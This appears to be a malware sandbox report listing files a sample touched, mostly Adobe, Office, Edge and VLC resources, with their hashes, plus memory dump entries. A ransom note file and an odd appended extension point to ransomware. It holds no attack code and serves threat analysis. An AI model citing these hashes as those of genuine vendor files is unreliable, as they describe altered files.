029a4bbeb87375900c036ebe15950fe16b0efdcd768e5d4c2043907cd6440880b89417250479e7653c92fb68edaef9c0515edc58c36f29b7d43c22e55d846c8a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js

Filesize
2KB

MD5
7289cd14b30c63f8a50f13d92d7250e2

SHA1
270b7d208864f2eb961382a5a08b1759e6624c2f

SHA256
847068162c32c1a9099fc7741de23a970fad488b8662efadb9cd58bf56ca36cf

SHA512
73816a6339f341bf08c852d60427c0c590a87f2bd4c1773c0338204e7803372fe48b80af9926c7e5fdb7dcc911aed8078e12a78050136f1b7e2e46055e5cfcf7

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\ui-strings.js

Filesize
6KB

MD5
396ceda2f18a61821ea9518633cf210b

SHA1
d9f3b2dd61d4c166e2cd21c69c1856cfae256d1b

SHA256
d11769c4717debd7521206fa7c58dcd28c98fc7263a727ab84f9d75d35208a2a

SHA512
8dea0f7d3de51c61b6a29e98f8cf4f8217d2057aa5825208a2d3df07bfed1bcdeeffefc86d22b08086313a3c5a4fbf5b835f5d23cbc568f807a8c05a44664c02

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\PlayStore_icon.svg

Filesize
6KB

MD5
57eb321a6ba1d2961a68df33684f6f59

SHA1
001d11be49f008c2849c781c8839e7c756372d35

SHA256
5297ec573117b6d898c2f9e1615b0c4e1b7883a72676ba3eb2e8cfc7213f8d65

SHA512
97723beb0cf894ee22d6d40055ae665bb67305ac74943ad4fa42d0da5ff733c8bf0a83c2ca6e1f74876dc04a12919ecee83375bfb4e4258ded0f67645d24f312

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js

Filesize
14KB

MD5
7df857d6f8f8c17471a01dc1925462b5

SHA1
ceba7e288160b536c56e3cdf6381141721c08d78

SHA256
bfb6fa061a787903f84ecf0d8dee247fc2198d0b8b432e0cda532dd395645882

SHA512
76a45682576199496a3418f541663802bba58fbcee0d4b90cb6538289836d736e64feea613ef381e5bc0ffe72d0ceda91f27383dcecbce902d1acabea41e0e1b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons.png

Filesize
2KB

MD5
0f470fb75ab2f07fc045d90e41e9bcb2

SHA1
fc53d9ee51e487c69e194c00be644e5df7aa045d

SHA256
db00551b2a1f29fd5d199f1fd275e5f80e4f008861cfd6194c9197a498fc7ad1

SHA512
04bfedd56fd8a3525f82495303a97bc26dc84022ecbf5e79f5ab3c470f70733283b61adbe747f2b0a74cad087b31413c6c718aafc55edb71ca496924fe2055a7

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons2x.png

Filesize
2KB

MD5
3fdacfa82029f242ec39cb2d5a265dc4

SHA1
0e1969b6d7fdaff9638344a125f0de306a3ca044

SHA256
99b91541a149180f9f52ea0f01bb42f8916089cddb22a499391c3ae31d40911d

SHA512
54b40c83f5b199726b971451c454714c989bbe2a5eb9628a46e76f9bd7fffd3440a94c2bceb5d81ab2cfc33749b64bb47864defecce6bb213a83d0817fafca46

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js

Filesize
15KB

MD5
19945f32c64be61f60242b4c567c8375

SHA1
958e961af85f31a20687d639c043be1ff34efd32

SHA256
9130299df5e1f4d509c1be1fb71a721cbbcb8c8aa1dc88d808f8e0bdad877375

SHA512
60c4b5a44f82ff6cffdb7df8b27f3d0d04f00d7b200d9acef9dbf60843a254e576e33a4cc8fe133e6093ef7704abbe5a5aa8d69648a65e524eaab94ecc033a17

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js

Filesize
2KB

MD5
a2f282bcd416506905916e054214dd26

SHA1
3d988aab6eb1eee94b8a36850892288e3b3620ba

SHA256
3e95900c625dfbf0fcc0aae0d11f2658b8a57a2fcbbb459fdd48db56404b3058

SHA512
a2e01526eca32b94f8ce6191ec63be7602fcbe09e981d29d617e54a91ce10e19f4f7420533eea9b0de516bb08428bf0c34860c2855a09fdab9e4c885adca9e62

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js.busavelock235

Filesize
2KB

MD5
eebacee98d618d5bbfb050eccdf6100b

SHA1
6c4eff75600f40201c8257e4d30c595c4879e96d

SHA256
9e98ee3db30de0bef37135ffd1c49c6aa1f54b28186f73d0ef2887d6615439b3

SHA512
69e77b013b6e95802e8eba8d9bef60e61655087b391a7dfcfa4f5d386d7404b0c26dadb5a20a7f43fceb78c12fda019fddcf67de629c5ff40a2d088d3d8b7bba

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js

Filesize
2KB

MD5
5281918b606c1d26c1393b0da107a888

SHA1
e4827306c1b6564cf5bb67944b1a272a6c68331c

SHA256
017744830c8797f8f9938686c8528dd008876dc444e7fdaf2af1e28f1e8c8fab

SHA512
15e997b5a3e1d5819ab7c5ca208285f4adcb77fa518479a8f7b60ccd199bdcf1d58a84c88e7eff7a988b7ad1eb6ed239361da9e7d7bb9b1d586889459deb7370

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\ui-strings.js

Filesize
2KB

MD5
321ea24312395037b4d783770d312b6d

SHA1
95e1ad62894a3cbf3d7462c8691a622115d996ad

SHA256
6bbcda1dc67c49969c83b385226bfddca5d005f2ab83e91c8a1fab158ba93bbe

SHA512
3fa968db1ac7e732e9f8499d71b2362ab5b46c53d64f8f8310941843fc46171720e6269b03fa3d41401058ca3a77be8b3c0e40f7a701bdd6d0a811d6f6bd64f2

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\ui-strings.js

Filesize
2KB

MD5
56d8c1a62fc94d693f9aa5673c1c4c25

SHA1
8c7e07c2a7d48a58e11896ded38c4cd8c063e9ad

SHA256
f083e8a3433818dd33f3c689b4c2679b0da1269e91946b6172d8e3fc291249f5

SHA512
0cd91eb95315c5024741532ba8a18be155f8e56f4c4666c8504f2d6d500538dc0197739a422fdf3b4d30109c422cfb056c850b38c356d10731b3a82cfa4d2af1

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\ui-strings.js

Filesize
9KB

MD5
d3afa2644481b1aaa9a182bef8f80457

SHA1
c4fe4d690b55dd25dd8ceef4ad327646e9cdd7dd

SHA256
0610744642e96895208962a63874f76f040696cb2a760d3abe04e0aecddf13b0

SHA512
b40147df14e4813c9e0211179f393e214cc18106536ff83dfe7d951674b38b096593d313217c3ec95dc286877f37704410df71e1875e03fe4f7623d3f173893b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\ui-strings.js

Filesize
5KB

MD5
d128cad21858aecf6834c8ad7cb1ab37

SHA1
f63f437afe506b95698cf9d79c8602afc4a775c4

SHA256
034bc710ab6d10960b81603c74923c512d01784ee72a3fd0d252bd13f9be48d7

SHA512
3cf2bda74bf2631330775f2aede60dfe6bae8791b40b68cd22f401fef2335e9041986d63b37bf98065b0f33c55dc45e0f613ef193ab84dc45a2bd70457850c13

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js

Filesize
2KB

MD5
41036a419c157284d03b55c0aca7e450

SHA1
900e1fb16bad9860ecda0e4c508afa123baf71a3

SHA256
1239a22f95d769c8b58f7abb605862a5249396dbb461d07cb5acad96b0d07b55

SHA512
a015871d6e1d3f4ec29aaf43bdfe5a12a9d97f881f4b6201e8e2a46f7517c4c82ba8ec52fb4797adcc9bc5598793309cca628b30119b11aef9a8437046cd4110

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js

Filesize
15KB

MD5
43dfa1e64d920a0d90502f9a8ef20c7d

SHA1
d9e0a2723a7fc6501d1d5810eb80407da41f8b1d

SHA256
d9288cb7b7b0ffc09be7f1f1fdb927b76acc2d57999ea700b723daf1ea61a44c

SHA512
8b7c0ac324eba63626deb431fd9a01c1bcb1cf3f506a444ed77a3c3c49fe548b9674f271417a7db9419fb157fb090252f2000c1090e22bb2e809b0aab6d72adc

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\ui-strings.js

Filesize
2KB

MD5
e0fedb4631c65ebb508c151b38f25948

SHA1
64806fb9577b4403d7dcaebbb17444c3a2ff0da7

SHA256
81153764abf6cd6c6af08dc0d2911196af9d301c16bb959958690109b7c4a4cd

SHA512
c3d778a34c8a2515dcebf015e2272027a1d9ecd4892b8d9a0ba35f1e6a18ec6c1e4378b9f0c463c07496d50fb5174d4009c8681cd296555bb95cd94c38bd0bc7

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png

Filesize
4KB

MD5
3e59fd3944b83a411724c1cf9a9143ae

SHA1
8f212346dabdc73d47713fbfc13cf70f5b0021a7

SHA256
bfde1e5b607011a6c2f8cf7935543bb3cfafaaebfca900a7d11949d9863a1045

SHA512
edfeafea3cc2441f6b7a118cfcb0775b06d8a18097215b600549b6c7ea60b3ec75ee066d12991c7c8e23f8c2d6b4c5959fa440d23f2f99d5326b970edd13a34d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png

Filesize
3KB

MD5
48d5fcb0d3faa3a522dd23d8821fd46d

SHA1
39b56d501feafb8f7f286e3cca422a68cfabb7c0

SHA256
d4e519a4040ce1649f687aa22f3c212f407ba92bdeb031a3634d7e5a496faf6e

SHA512
1f17915e8618ceb336f4411281a390c5c8521f765eeb8a862ded8172186a8f23871a90959c36766bb1c28f8d39f11f4bc14134b1914791ba8406c042604e28ae

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png

Filesize
6KB

MD5
92df75770071b1642396420015eeb70e

SHA1
064ae744013de11908616c8ccf0a97bcf898732a

SHA256
690706438d709bb60b9fe41ac6b19b34712d865017a1d578ca3b0825e43233ac

SHA512
daeebed854ffb9900be121402ff678e793a4d39b9117e8a4490b6c37ceb26ab6ace470dbebf5415889d206e3e38be013c6cb5f255c5ae545fdd52fd86bf5101a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png

Filesize
1KB

MD5
2d889cd2358fcd5b60ff0b3d73258bf9

SHA1
9c1a68948b8038d1739023587c869af52df5c16e

SHA256
e232ddafa62ddcd9ba991fc67e4db86b86d366f8df6b6c150d6a5a21cf67761c

SHA512
a40ffff231574d87bd39a7e5fed1601a1d8c846c9518aef61c6f3e453ccc4de5cf42e0c0f97784e2e266dad104327ff1ed1a9a2e5a8082733b90200cd5ee70fb

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png

Filesize
1KB

MD5
e644d9d74a2d8a4e0c6d733ca6cf567c

SHA1
f949abed62e5492e5cb5b935ff93836852aea0ee

SHA256
e20a685cab3c8b58e963594dda00e7eeb68d918fb07dae8002a7db2699c2ed67

SHA512
9e96d059ce6d58157fb643cbb68dc428b537fd75eb717f32282c94d59ff30a421d9159a63e06ccce33056c8653df29ac9fb63e8f83c29aeb3f56715165d5ca75

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png

Filesize
2KB

MD5
59500399f70294c09dff974722e3ee90

SHA1
18009c0f6ff114cdbfd58ad57b5468493e982de0

SHA256
c30b647c9ae25fca31114d88c94c4bde77ba8539bf911d4d87e2211646a0b6ab

SHA512
2f6ca1616d013781346f67b7c903c1816f6ecdbcf7a7d519374309f1ff1c7abd5b3730518f71b3487cd7dba0ed371b13a6d3a9e1becf5eb2bf4c5711183d67d6

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png

Filesize
2KB

MD5
55604e21e46a5376fab54a86d7e0cf32

SHA1
ea6845199fb5a801d65be2ccb33997edcbd21a86

SHA256
f58bbe25dc1d1e81b07293de69cf331ce44e582a1087675c064ac3a29a144136

SHA512
ea83acdea106ac2ab03e7a266654868cb718d05dbac52f7e9c9c28a890b437b9445ad4b2de3ab80070710b0afec52aad28c0b8b528579c64732972f415993396

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png

Filesize
4KB

MD5
65e2729742ecc5018d3b9525a4a77b30

SHA1
d7db5bf64a9947ef1f877c81beeab5fe6a4d3bad

SHA256
9f3b11cfb29d125dae5e0dbb8c55fff7c79fbac91bdfcc4c5a30874187e1a5d6

SHA512
8d4a36bffe5999dc26f8eb62ef3a44dedd7718b46853453e4618cb126761dd9dc9d2194fd0306f7d31eeb3c6f5345de350e9d5ba7643f3623034e63a586d5934

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\ui-strings.js

Filesize
15KB

MD5
a66eeed0cd9e8a1822eb47153355cc49

SHA1
73bdcb095b8f774283878738114be31bfac5b9e3

SHA256
a31619d13b5c405ab6e607c70afce2558a64f71096253ba1cda9c99e202cc950

SHA512
91adf079640ca16f7421995286ff7fbc22f16eafb9974c849b9f6a6d55dd0df4700f7582f52d2a0ff8458203555238ac96ef143ec371d51d97069c4786e3f8d9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js

Filesize
2KB

MD5
d057d94ee18dd89f03ae4313266f8628

SHA1
2d6045b041f01f995360494afe6bfd4effa63b9a

SHA256
83aa62b344c70c30400d7016c969a79205fb23bda2c58a21ed67c78870bb8716

SHA512
462038ff79bad452df7e71a81f63ff52b61d13d91bd3e9238b06230fef96743a11795ac0be2868b77ece7c386f55dd20f0c300b8662e2dfbba5666a745991665

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\ui-strings.js

Filesize
19KB

MD5
213a804a0fb975eafe7506b2305f66d9

SHA1
1e8834c4cb48a4b9e1db348c7eb97794d7ce2dd7

SHA256
0e9ecda7dff08873f8e27e1dc224c5619976c991d4023b3641e6f6f9d69c078d

SHA512
cdfb105434db764d2ccc098f19387721226fff898ddf71598607ea7361eae75b8b24365542dfab26cf024859483399f58d95907d15755fa3b1d554e37ddd22b5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main-selector.css

Filesize
2KB

MD5
33f92f2fed5794abd48d94b6b08bd7ce

SHA1
4a98b17cf075a25179d1ec2be7bb911d22b5bb06

SHA256
cc0915fb5aba604e8b1112e01f9b6fbef8f8880d677df25503c61d85aa6fb75a

SHA512
501d27d11e8a971794799bdddaa4c8a030e22d4c187dcab00ffb9421b7b9ece59a7c694b40348800cd78aee951849b4f8d02351f47700cab10f1d1198d1fd029

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js

Filesize
2KB

MD5
dd6b1e7ab1f6b8af1ee4e88a245fe2b7

SHA1
7dcd0675cf62cf9fd5aee2a2e152724f64dc0067

SHA256
b9031f1f62a56c17420b9fc19e29aab0eaf42f5caa33e386020c8417e57b93a3

SHA512
199502c151010e8ab06558c1fefd02ee73b626f401f5df2a8017f33d4c5a0bdcbf9df743edcbad9aca434f1241fce1c9b177360536870fb2bdb7910b5060dc84

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js

Filesize
3KB

MD5
a14c095a7ee4ce0ad38981f44b574a8d

SHA1
4cb254f180b2aca761ca800afa4ed05b72e03a3c

SHA256
016e4674b739a53b77939bbd74a9d31d0ae58cdfea7df694c8af5582fcda9add

SHA512
38a96d691a7d9b61521916f42b53340fea6c7676604637f1c0af3b916d6bff6b263a4efe16f49cc915d14827295251577941951462f7d59a242b8d439af0239a

Download Submit
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

Filesize
34KB

MD5
6375ca18c05104ddab12c33c0a6b6ffd

SHA1
ce8ddd0f2292993ca617ba8acd28b549960dfb43

SHA256
89c4c72ead1ef4ca3800d92569a6dde9158a221e5fe7d72ddb4f79947c03b09f

SHA512
88b1b028ea0b258957da8b5a6b7c25784645489ce4b512e209da4237da7b73d18a4dd21ebe720c050652777fd3276bfa348f770b79e1ac2d98f610fab5a26eb3

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\identity_helper.Sparse.Internal.msix.DATA

Filesize
56KB

MD5
50de4afeaa0405efa51f1bd15ad584a9

SHA1
686e6d40d810b70006e955d797b88b008105de6f

SHA256
2e55ba6a184cefd72b8ffbda34c39786c436ca2d15bf874645306ff26b92cddc

SHA512
5e1e5578f7a11e6bbf69142d1556f02d6051195449913169bac0071d1a92e12c4454769a279dff7954904a48d59071b2b1903a7c42f77ee3a0e76064e7de20bb

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\notification_helper.exe.manifest

Filesize
2KB

MD5
fdee5c352204560fe0702e4e5cbe4c53

SHA1
4d0119de4262477c6b66517017c9e6b22fe2b40e

SHA256
0e39a74c03459e435548f0955405bc449472c5f382fdaab8b1655cd2204c3536

SHA512
aba639fae1f94e054a03e981dd0e68b7137bd330446bea5a29f28afb26923ace0c9c45f7579a9c4daf346f2028fd559d5891a97fe3e5833113a11855b5c6d7d6

Download Submit
C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif

Filesize
1KB

MD5
23de259afa032e5fede2bb3cdc34cd73

SHA1
66b0dfdea26b6f126ebb0ed68e54999439922a73

SHA256
8e9afaef9c520be614b467044cb8060b5ada2b60a17240d52081ffeea1b3661f

SHA512
6e1bc002c89b497ccc0302f4827aa29a7a64aa4be6ffc326a342821921b85daeaf416b0428c9f239bfecce4808878a5c9fe5c35ae794f3eab9c1e45068add5fe

Download Submit
C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub2019_eula.txt

Filesize
1KB

MD5
df166a1ab3c41890c94888abaa160b41

SHA1
4882b1c2b8395ed6630257daef9954d7b29e00cc

SHA256
6169d0d294b3733cf2eec8e8d568de4657989364caaf15f1e440549a1d5bf8a4

SHA512
a0aa192953ea727476973bc973e9c3ec52a4eb73497ec9963a81e63e7a16e0e9ff382a6747c860463d3a997324a5ff1e36f56a5ee0e9916b60707d8afedeefef

Download Submit
C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_F_COL.HXK

Filesize
1KB

MD5
9f7607245b16e92f65c4440acca2ef9d

SHA1
a2f3f49379afb7f13c5e645600a9f6435afb9e38

SHA256
0b71682fb336c8e52af44824bf122cd80ca8dbda3aaa6214ef9007f4304b4ff8

SHA512
ca793b9b83c9f5a333ab1e0881a1c2fc7f00f6173d7a8b03c2a945765515a233cee510c52dc1701384685d44bfca90d1f42a4a2a6b6faa49e0790cb56a7a1b3b

Download Submit
C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_K_COL.HXK

Filesize
1KB

MD5
d6fd3710ab1a0a1df980ef70889d8745

SHA1
dba459f3822ee7aaa325d83a05fbd24ec1991f71

SHA256
e44a8be361fe6844a178dca3e0d022899ca67567dbce469d9c88948e736b7deb

SHA512
078b2d340093604b2a0c18ec3d6dce70bf6340e4c0b5f0974cec0fb8b3d0dd332fe1220f4acfb0f063cab6dbcdfbd11482310ca446f277ade174357ae2fca518

Download Submit
C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe.config

Filesize
1KB

MD5
98bcc313755335fe61606beb5a5fd445

SHA1
cec0f627b78a3b3370452e540e81e7921788d593

SHA256
6fdfb7f3cff9eb9f2f6dcc271169c1248be8e1a3c5ea23b2336fc236cdafc41e

SHA512
50d0cdc08452aef9c258ddbbc35bf8560d3e80563f2b7257b839fbdbc152b1961e8bf8664eb8595572ad7b77d4dc59d8f702a4446dbeee1245f3589ed326d149

Download Submit
C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\SIST02.XSL

Filesize
246KB

MD5
da320926d4b93da71bc0e0d84552e3ca

SHA1
e8b8482d1ec7d8bfd408de3b231799b079465e3f

SHA256
2794895b63ae28b3fed0339266018335c02942aaf0bdd6e1e6ecc86142f54ea3

SHA512
83a7bbd70a9a413a33b65ec1f9689a5c4633c6b1768c2229c74cdef32133b7c8d24702f3a5d0e0ebb6abc4026ceb241012e35e75d3aa1ed9c0b138e627eeecc4

Download Submit
C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8fr.dub

Filesize
1KB

MD5
64fcede54db127a28474e0dd7d7fd6b3

SHA1
918e75f8d5b1b711c993c6b22a8d6090b1ba43ad

SHA256
fa2a402bdd4d81a5613f7d9a68e3cccb8651be19e3967bf8416176dbd19f2871

SHA512
34928a9152ecaeec45db0a6a1b245296d3ff1b4589051beada9cffd5c14809b55b80d0e93d6a4e8a01881b4e15e67d7a30a41aba1530f38de5304baee6a6abd0

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmia32.msi

Filesize
3.0MB

MD5
0eaa7b141b4d881667708742ed155834

SHA1
a2ef957337ca15d6010794df8ddc782f4d928129

SHA256
4d86017efeb3c670ef0bb80693d92e0a57bd226d6a35e51a57a82417679e153a

SHA512
a08c3e5315cff43f66eadb2d8484437142c209218db18c796333c4c03b027d9fea6a962c95ba1a697363132aa64d00b2b26b3ef28f0731fc0908fe2f82cee20e

Download Submit
C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo

Filesize
609KB

MD5
3a8f1e720b1d07a9b34ee6d06f7e8090

SHA1
d5070fe0f14b844547b4e9cca95d754c4dd5648d

SHA256
0b5672337602ef158af4b8ce48a4b7afebdebfdc073a53da94cf71f90517318c

SHA512
07f7960249cd7c3e2cdc442ce2e68427fb89331335890443f97bc22866c02f0ad9ead4c3db2a1f7cfe6e18ea4776e8a2c1df2057c753395f975cc3197f4501c9

Download Submit
C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo

Filesize
785KB

MD5
0ebabbda7ee1124e414ec82181bdff04

SHA1
35a4734ed30879a88bce2da88b044dce91dfac4c

SHA256
a32acdfa2621f139b34dfbdeb81f6b60e39464c9cde0e6565e243e447909af25

SHA512
7a53499e2bcc0d410d1976cd20469161b4187c8f1c0cecbc9270d3a67f096bfa28abb58da21985f287bfb6c3be4cc726c398b159afedf83ac7cd7d3d5983a12d

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs

Filesize
1.3MB

MD5
763e9ad82ea2d267dcb6985ce1078f3a

SHA1
ac171e6e232ac7a604190c3c5c7b765282195b93

SHA256
2ef3e3619c8a1b5bc8a20030bc078d51b6e09281bb133a9972423765de72eba5

SHA512
68f2fe6f698a89754311cb9c4a025cda37d33a798501fde1142080fd35081373281166f0810e6b34b6f227be19c020eea7b3caa992e5ef4e1ccdb33b75422a5e

Download Submit
C:\ProgramData\Microsoft\User Account Pictures\Admin.dat

Filesize
1KB

MD5
3356b4673d22989d7ea53c79091b46e0

SHA1
b2fa23fa26f3ab6f060e95ca939aaeab4b0c3200

SHA256
b8f812cf7093e33c4f7c720d109f1b61c8abd1d437c5db44030518441f1dcd95

SHA512
41a6238ca05acb54867ff56b9b88e9a906a76250dfaf995a7e8aabcd8448a4571a9ebb7aebc0d7c92d0f9cc2739b6219306aaedd2112708986c34babc74984ad

Download Submit
C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

Filesize
181KB

MD5
c804174d84154b09a2ee062353f11fef

SHA1
0c5c2759beaf3a465f349a600c30660310adf9a0

SHA256
cd89eb4316acb5ab920ac04d89455f8ca927c134cf7b20a27ddb7d34eb985d19

SHA512
61be01804703d8665b067a6ef067c8068f86e4f7d2f1c9ff3bb157ad71e6955d67390313faaf665ba5e834510e0cf0688151a190efbdf717ccfbb7e3659ad495

Download Submit
C:\ProgramData\Package Cache\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}v48.100.4028\dotnet-host-6.0.25-win-x64.msi

Filesize
737KB

MD5
498371c646a4a58a10473a1853df1d36

SHA1
c4befb4ee0fb7086d1c6f4cddf221567258c3262

SHA256
ee63820137388cbf2fc836feac4a75c4ac0a8557771715db7e7a7a7e510e484c

SHA512
30a22ada997394576c2509474ddb6926ccfbcf0fac4f78556da7ffbc5e96766d4e292aa5f2b72ddd1d189372fc2529773904737212629b28b028454438fbe894

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\000003.log

Filesize
1KB

MD5
09eb971a0d419f27028fb92c8c4caa0f

SHA1
47a231a7f0d0eae09086b8b68f8d65719c59b5c1

SHA256
48beef5e56931b3685bdde7c936706e5bb6918f8ea06f44ff66c64a59b889c6f

SHA512
c09ade8f6f94355724c9310773c194aa057fed111ee4004204b69be77517fb62c2ad6f58b02b6cf52681878a67a8e01e40d43bad37654ef194145a95e2e00060

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\UXZE23G7\microsoft.windows[1].xml

Filesize
97B

MD5
cf431c7d433b1384d2f6df919483feeb

SHA1
f8ab70eb8a468990556a07731e8f4f698b8a159e

SHA256
12be83d718acf262c1535d1109ed07b917a3fd7d55f8a0d8f5d5bcdeeafcf626

SHA512
be8ba596a5c29006d5edc9e4089b63ec120062de8e2297b34756dea825b68a0afe361a9b5bcd9a8a9390308ddc97d3108328437b20cd14b89dda54a2991c4218

Download Submit
\Device\HarddiskVolume1\Boot\cs-CZ\How_to_back_files.html

Filesize
4KB

MD5
7aedfb5e99e5d4453e951ab7ffe4cfc5

SHA1
c3fe37c9cf76cab9b4692d6a25690fe865ef96ff

SHA256
f288a2d16bae24fb49ad588da9fe7c216ed2dca7aebb78b7eb256fa101dd5080

SHA512
0118f3ddd969dcc6da17f56368fa3d6e2031badea82e48b2b81788959f9bccbb64c7d573279be4b7a03f9b7dd46da9af1c1bd40c54fc9ba4788caaf5231e60df

Download Submit
memory/1744-16992-0x0000029B5CB20000-0x0000029B5CB40000-memory.dmp

Filesize
128KB

Download
memory/1744-16990-0x0000029B5C720000-0x0000029B5C740000-memory.dmp

Filesize
128KB

Download
memory/1744-16987-0x0000029B5C760000-0x0000029B5C780000-memory.dmp

Filesize
128KB

Download
memory/2904-16966-0x000001F80C090000-0x000001F80C0B0000-memory.dmp

Filesize
128KB

Download
memory/2904-16968-0x000001F80C050000-0x000001F80C070000-memory.dmp

Filesize
128KB

Download
memory/2904-16970-0x000001F80C460000-0x000001F80C480000-memory.dmp

Filesize
128KB

Download
memory/2944-16928-0x0000020152900000-0x0000020152920000-memory.dmp

Filesize
128KB

Download
memory/2944-16930-0x0000020152DA0000-0x0000020152DC0000-memory.dmp

Filesize
128KB

Download
memory/2944-16926-0x0000020152940000-0x0000020152960000-memory.dmp

Filesize
128KB

Download
memory/3408-16954-0x0000019AEED60000-0x0000019AEED80000-memory.dmp

Filesize
128KB

Download
memory/3408-16951-0x0000019AEE6C0000-0x0000019AEE6E0000-memory.dmp

Filesize
128KB

Download
memory/3408-16948-0x0000019AEE700000-0x0000019AEE720000-memory.dmp

Filesize
128KB

Download
memory/4744-17010-0x000001CF45F50000-0x000001CF45F70000-memory.dmp

Filesize
128KB

Download
memory/4744-17012-0x000001CF45F00000-0x000001CF45F20000-memory.dmp

Filesize
128KB

Download
memory/4744-17014-0x000001CF465A0000-0x000001CF465C0000-memory.dmp

Filesize
128KB

Download